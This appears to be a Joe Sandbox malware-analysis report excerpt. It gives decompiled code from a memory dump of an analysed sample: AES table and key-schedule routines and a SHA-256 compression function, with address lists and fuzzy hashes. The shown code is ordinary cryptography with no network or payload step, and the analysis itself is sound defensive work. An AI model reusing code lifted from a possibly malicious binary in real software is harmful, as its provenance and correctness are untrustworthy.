0x00e84ae0
0x00e84ae0
0x00e84ae3
0x00e84a50
0x00e84a52
0x00e84a57
0x00e84a59
0x00e84afe
0x00e84b02
0x00e84b0b
0x00e84b10
0x00e84b11
0x00e84b15
0x00e84b17
0x00e84b1c
0x00e84b1f
0x00e84b21
0x00e84b4a
0x00e84b4a
0x00e84b4d
0x00e84b50
0x00e84b57
0x00e84b59
0x00e84b5c
0x00e84b5e
0x00e84b62
0x00e84b62
0x00e84b65
0x00e84b70
0x00e84b70
0x00e84b72
0x00e84b72
0x00e84b74
0x00e84b7a
0x00e84b7a
0x00e84b7f
0x00e84b82
0x00e84b8d
0x00e84b8d
0x00e84b8f
0x00e84b8f
0x00e84b9a
0x00e84b9e
0x00e84b9e
0x00e84ba1
0x00e84ba7
0x00e84ba9
0x00e84bac
0x00e84bbc
0x00e84bc1
0x00e84bc1
0x00e84bd6
0x00e84bdb
0x00e84bde
0x00e84be3
0x00e84be6
0x00e84be8
0x00e84bea
0x00e84bed
0x00e84bf0
0x00e84bfd
0x00e84c02
0x00e84c02
0x00e84bf0
0x00e84c09
0x00e84c0e
0x00e84c11
0x00e84c16
0x00e84c19
0x00e84c1b
0x00e84c28
0x00e84c2d
0x00e84c1b
0x00e84c30
0x00e84c33
0x00e84c38
0x00e84c38
0x00e84b84
0x00e84b87
0x00000000
0x00000000
0x00e84b89
0x00000000
0x00e84b89
0x00e84b76
0x00e84b78
0x00000000
0x00000000
0x00000000
0x00e84b78
0x00e84b67
0x00e84b6a
0x00000000
0x00000000
0x00e84b6c
0x00000000
0x00e84b6c
0x00e84b60
0x00e84b60
0x00e84b60
0x00000000
0x00e84b60
0x00e84b52
0x00e84b55
0x00000000
0x00000000
0x00000000
0x00e84b55
0x00e84b25
0x00e84b28
0x00e84b2a
0x00e84b32
0x00e84b34
0x00e84b3e
0x00e84b40
0x00e84b42
0x00000000
0x00000000
0x00e84b44
0x00e84b48
0x00e84b48
0x00000000
0x00e84b48
0x00e84b36
0x00000000
0x00e84b36
0x00e84b2c
0x00000000
0x00e84b2c
0x00e84b04
0x00000000
0x00e84b04
0x00e84a5f
0x00e84a5f
0x00000000
0x00e84a5f
0x00e84aea
0x00e84aea
0x00e84aed
0x00e84abf
0x00e84abf
0x00e84ac0
0x00e84ac2
0x00e84ac4
0x00000000
0x00e84ac4
0x00e84aef
0x00e84af2
0x00000000
0x00000000
0x00e84af8
0x00e84a67
0x00e84a67
0x00000000
0x00e84a67
0x00e84a93
0x00e84ad6
0x00000000
0x00e84ad6
0x00e84a95
0x00e84a98
0x00e84acb
0x00e84acd
0x00000000
0x00e84acd
0x00e84a9a
0x00e84a9d
0x00e84abb
0x00e84abb
0x00e84abb
0x00e84abb
0x00000000
0x00e84abb
0x00e84a9f
0x00e84aa2
0x00e84ab4
0x00000000
0x00e84ab4
0x00e84aa4
0x00e84aa7
0x00000000
0x00000000
0x00e84aab
0x00000000
0x00e84aab
0x00e84a22
0x00000000
0x00000000
0x00e84a28
0x00e84a2b
0x00e84a6b
0x00e84a6b
0x00e84a6e
0x00e84a87
0x00000000
0x00e84a87
0x00e84a70
0x00e84a70
0x00e84a73
0x00000000
0x00000000
0x00e84a76
0x00e84a79
0x00000000
0x00000000
0x00e84a7b
0x00e84a7e
0x00000000
0x00e84a7e
0x00e84a2d
0x00e84a66
0x00000000
0x00e84a66
0x00e84a32
0x00000000
0x00000000
0x00e84a3b
0x00000000
0x00000000
0x00e84a40
0x00000000
0x00000000
0x00e84a45
0x00000000
0x00000000
0x00e84a4e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: e30dd5165fbc82b53edd75972832d75a8b55fc8e4be48b8aa6528f9e9062ea67
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: D05166E1240B0B47DB3CB9A88655BFE63C9DB11308F18358AE84EFF2C2E605DE418359

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E147 Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00E6E147() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0xea51a0) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0xea4fa0) = _t192;
					 *(0xea5dc1 + _t181 * 4) = _t192;
					 *(0xea5dc0 + _t181 * 4) = _t192;
					 *(0xea59c3 + _t181 * 4) = _t192;
					 *(0xea59c0 + _t181 * 4) = _t192;
					 *(0xea55c3 + _t181 * 4) = _t192;
					 *(0xea55c2 + _t181 * 4) = _t192;
					 *(0xea51c2 + _t181 * 4) = _t192;
					 *(0xea51c1 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0xea5dc3 + _t181 * 4) = _t154;
					 *(0xea59c2 + _t181 * 4) = _t154;
					 *(0xea55c1 + _t181 * 4) = _t154;
					 *(0xea51c0 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0xea5dc2 + _t181 * 4) = _t155;
					 *(0xea59c1 + _t181 * 4) = _t155;
					 *(0xea55c0 + _t181 * 4) = _t155;
					 *(0xea51c3 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0xea50a0) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0xea6dc2 + _t181 * 4) = _t159;
					 *(0xea69c1 + _t181 * 4) = _t159;
					 *(0xea65c0 + _t181 * 4) = _t159;
					 *(0xea61c3 + _t181 * 4) = _t159;
					 *(0xea7dc2 + _t199 * 4) = _t159;
					 *(0xea79c1 + _t199 * 4) = _t159;
					 *(0xea75c0 + _t199 * 4) = _t159;
					 *(0xea71c3 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0xea6dc0 + _t181 * 4) = _t160;
					 *(0xea69c3 + _t181 * 4) = _t160;
					 *(0xea65c2 + _t181 * 4) = _t160;
					 *(0xea61c1 + _t181 * 4) = _t160;
					 *(0xea7dc0 + _t199 * 4) = _t160;
					 *(0xea79c3 + _t199 * 4) = _t160;
					 *(0xea75c2 + _t199 * 4) = _t160;
					 *(0xea71c1 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0xea6dc1 + _t181 * 4) = _t161;
					 *(0xea69c0 + _t181 * 4) = _t161;
					 *(0xea65c3 + _t181 * 4) = _t161;
					 *(0xea61c2 + _t181 * 4) = _t161;
					 *(0xea7dc1 + _t199 * 4) = _t161;
					 *(0xea79c0 + _t199 * 4) = _t161;
					 *(0xea75c3 + _t199 * 4) = _t161;
					 *(0xea71c2 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0xea6dc3 + _t181 * 4) = _t162;
					 *(0xea69c2 + _t181 * 4) = _t162;
					 *(0xea65c1 + _t181 * 4) = _t162;
					 *(0xea61c0 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0xea7dc3 + _t199 * 4) = _t162;
					 *(0xea79c2 + _t199 * 4) = _t162;
					 *(0xea75c1 + _t199 * 4) = _t162;
					 *(0xea71c0 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}

0x00e6e150
0x00e6e155
0x00e6e157
0x00e6e15e
0x00e6e15e
0x00e6e165
0x00e6e16c
0x00e6e174
0x00e6e183
0x00e6e189
0x00e6e18c
0x00e6e18e
0x00e6e192
0x00e6e194
0x00e6e196
0x00e6e1a3
0x00e6e1a9
0x00e6e1ab
0x00e6e1ac
0x00e6e1b1
0x00e6e1b3
0x00e6e1b5
0x00e6e1cf
0x00e6e1b7
0x00e6e1ca
0x00e6e1ca
0x00e6e1ed
0x00e6e1ef
0x00e6e1f5
0x00e6e1fc
0x00e6e203
0x00e6e20a
0x00e6e211
0x00e6e218
0x00e6e21f
0x00e6e226
0x00e6e22f
0x00e6e246
0x00e6e231
0x00e6e23c
0x00e6e23c
0x00e6e248
0x00e6e24f
0x00e6e256
0x00e6e25d
0x00e6e266
0x00e6e27d
0x00e6e268
0x00e6e273
0x00e6e273
0x00e6e27f
0x00e6e284
0x00e6e290
0x00e6e29c
0x00e6e2a5
0x00e6e2b5
0x00e6e2e9
0x00e6e2b7
0x00e6e2e5
0x00e6e2e5
0x00e6e2eb
0x00e6e2f3
0x00e6e30a
0x00e6e2f5
0x00e6e300
0x00e6e300
0x00e6e30c
0x00e6e30f
0x00e6e316
0x00e6e31d
0x00e6e324
0x00e6e32b
0x00e6e332
0x00e6e339
0x00e6e340
0x00e6e349
0x00e6e35d
0x00e6e34b
0x00e6e353
0x00e6e353
0x00e6e35f
0x00e6e366
0x00e6e36d
0x00e6e374
0x00e6e37b
0x00e6e382
0x00e6e389
0x00e6e390
0x00e6e399
0x00e6e3ad
0x00e6e39b
0x00e6e3a3
0x00e6e3a3
0x00e6e3af
0x00e6e3b6
0x00e6e3bd
0x00e6e3c4
0x00e6e3cb
0x00e6e3d2
0x00e6e3d9
0x00e6e3e0
0x00e6e3e9
0x00e6e3fd
0x00e6e3eb
0x00e6e3f3
0x00e6e3f3
0x00e6e3ff
0x00e6e406
0x00e6e40d
0x00e6e414
0x00e6e41b
0x00e6e41c
0x00e6e423
0x00e6e42a
0x00e6e431
0x00e6e438
0x00e6e449

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d780f1d2a58435e03130e43bd7ab7c472c2d15b64309389dc29d399ff2dc7345
Instruction ID: db9179f7a43fe356ea83b7f485779aae6378af9e0db3a83ec0c0eb77cb401a69
Opcode Fuzzy Hash: d780f1d2a58435e03130e43bd7ab7c472c2d15b64309389dc29d399ff2dc7345
Instruction Fuzzy Hash: B281829225A6E49EC7068F7E3CA42F63FA1577B340F1D00AAC4D5A73A3C1365A5CDB21

Uniqueness

Uniqueness Score: -1.00%

Function 00E6EB7B Relevance: .2, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E6EB7B(signed char __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				signed char _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				signed char _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E00E7F750( &_v32, _a4, 0x20);
				_t141 =  &(( &_v40)[0xc]);
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0xea51a0;
						do {
							_v32 = _v32 ^  *((_t141[0x15 + _t135 * 4] & 0x000000ff) + 0xea4fa0);
							_v31 = _v31 ^  *((_t141[0x16 + _t135 * 4] & 0x000000ff) + 0xea4fa0);
							_v30 = _v30 ^  *((_t141[0x17 + _t135 * 4] & 0x000000ff) + 0xea4fa0);
							_v29 = _v29 ^  *((_t141[0x14 + _t135 * 4] & 0x000000ff) + 0xea4fa0);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_v40 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_v40;
									 *_t58 = _v40 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_v40 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xea4fa0);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xea4fa0);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xea4fa0);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xea4fa0);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_v40;
									 *_t79 = _v40 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_v40 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_v40;
										 *_t53 = _v40 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_v40 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _v40 + 4;
											_t133 = _t133 + 1;
											_v40 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}

0x00e6eb81
0x00e6eb91
0x00e6eb94
0x00e6eb99
0x00e6eb9d
0x00e6eba2
0x00e6eba5
0x00e6eba7
0x00e6eba9
0x00e6ebad
0x00e6ebf4
0x00e6ebf7
0x00e6ebfd
0x00e6ec02
0x00e6ec11
0x00e6ec20
0x00e6ec2f
0x00e6ec3e
0x00e6ec42
0x00e6ec44
0x00e6ec49
0x00e6ec50
0x00e6ec81
0x00e6ec85
0x00e6ec8d
0x00e6ec8f
0x00e6ec90
0x00e6ec93
0x00e6ec95
0x00e6ec96
0x00e6ec96
0x00e6ec9b
0x00e6ec9b
0x00e6ec9b
0x00e6eca7
0x00e6ecab
0x00e6ecb9
0x00e6ecc8
0x00e6ecd7
0x00e6ece6
0x00e6ecea
0x00e6ecec
0x00e6eced
0x00e6eced
0x00e6ecf0
0x00e6ecf2
0x00e6ecf3
0x00e6ecf3
0x00e6ecf8
0x00e6ecf8
0x00e6ecf8
0x00e6ec52
0x00e6ec55
0x00e6ec5e
0x00e6ec62
0x00e6ec66
0x00e6ec66
0x00e6ec68
0x00e6ec68
0x00e6ec6c
0x00e6ec6f
0x00e6ec70
0x00e6ec75
0x00e6ec78
0x00e6ec78
0x00e6ec78
0x00e6ec7f
0x00e6ec55
0x00e6ecff
0x00e6ed03
0x00e6ed44
0x00e6ed44
0x00000000
0x00e6ed05
0x00e6ed0c
0x00e6ed38
0x00e6ed38
0x00e6ed0e
0x00e6ed12
0x00e6ed15
0x00e6ed19
0x00e6ed23
0x00e6ed27
0x00e6ed2c
0x00e6ed2f
0x00e6ed30
0x00e6ed36
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6ed36
0x00e6ed19
0x00e6ed3b
0x00e6ed3b
0x00e6ed3d
0x00e6ed3e
0x00e6ed3e
0x00e6ed42
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6ed42
0x00e6ed05
0x00e6ed47
0x00e6ed47
0x00e6ed47
0x00e6ec02
0x00000000
0x00e6ebaf
0x00e6ebba
0x00e6ebc0
0x00e6ebc4
0x00e6ebcd
0x00e6ebd0
0x00e6ebd3
0x00e6ebd4
0x00e6ebd7
0x00e6ebd8
0x00e6ebdc
0x00e6ebe2
0x00000000
0x00000000
0x00000000
0x00e6ebe2
0x00e6ebe4
0x00e6ebe4
0x00e6ebeb
0x00e6ebed
0x00e6ebee
0x00e6ebee
0x00e6ebf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6ebf2
0x00e6ebaf
0x00e6ed58
0x00e6ed58

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2412a62af033f3a10176494400a959345369c6c6d0703836e9802eb171985b38
Instruction ID: 5e5d34b3210b849d9c0c95cf1f67616f9f7a2beeab9a9df682f37c926c828209
Opcode Fuzzy Hash: 2412a62af033f3a10176494400a959345369c6c6d0703836e9802eb171985b38
Instruction Fuzzy Hash: 1F51D3785083D14EC712CF24A18446EFFE1AEDA354F59689EE4D56B282D330D64ACB53

Uniqueness

Uniqueness Score: -1.00%

Function 00E6FC43 Relevance: .1, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E00E6FC43() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00E86354( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0xe93a50; // 0x0
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}

0x00e6fc4d
0x00e6fc54
0x00e6fc56
0x00e6fc59
0x00e6fc60
0x00e6fc64
0x00e6fc67
0x00e6fc69
0x00e6fc70
0x00e6fc74
0x00e6fc75
0x00e6fc75
0x00e6fc7a
0x00e6fc7e
0x00e6fc81
0x00e6fc84
0x00e6fc92
0x00e6fc95
0x00e6fca7
0x00e6fcaa
0x00e6fcaa
0x00e6fcb2
0x00e6fcb6
0x00e6fcb9
0x00e6fcbc
0x00e6fcc3
0x00e6fcca
0x00e6fcd1
0x00e6fcd8
0x00e6fcdc
0x00e6fce0
0x00e6fcea
0x00e6fcec
0x00e6fcf0
0x00e6fcf5
0x00e6fd04
0x00e6fd19
0x00e6fd1d
0x00e6fd25
0x00e6fd29
0x00e6fd2c
0x00e6fd30
0x00e6fd34
0x00e6fd36
0x00e6fd3b
0x00e6fd42
0x00e6fd59
0x00e6fd5f
0x00e6fd67
0x00e6fd6b
0x00e6fd6f
0x00e6fd78
0x00000000
0x00000000
0x00e6fce6
0x00e6fce6
0x00e6fd7e
0x00e6fd82
0x00e6fd8d
0x00e6fd93
0x00e6fd98
0x00e6fd9f
0x00e6fda6
0x00e6fdad
0x00e6fdb0
0x00e6fdb7
0x00e6fdc4

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6986ce560c50b5d7cbaad4eb637922682ca132fce91c99752c56656829b00bf9
Instruction ID: 0b202f9a14fabe26d2188b6b191194dbac2fbc6616fc1645d6f5c2b0e63f5361
Opcode Fuzzy Hash: 6986ce560c50b5d7cbaad4eb637922682ca132fce91c99752c56656829b00bf9
Instruction Fuzzy Hash: 8D513671A083058BC748CF19E49055AF7E1FFC8354F054A2EE899A3741DB34E959CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00E73A02 Relevance: .1, Instructions: 112
COMMONCrypto

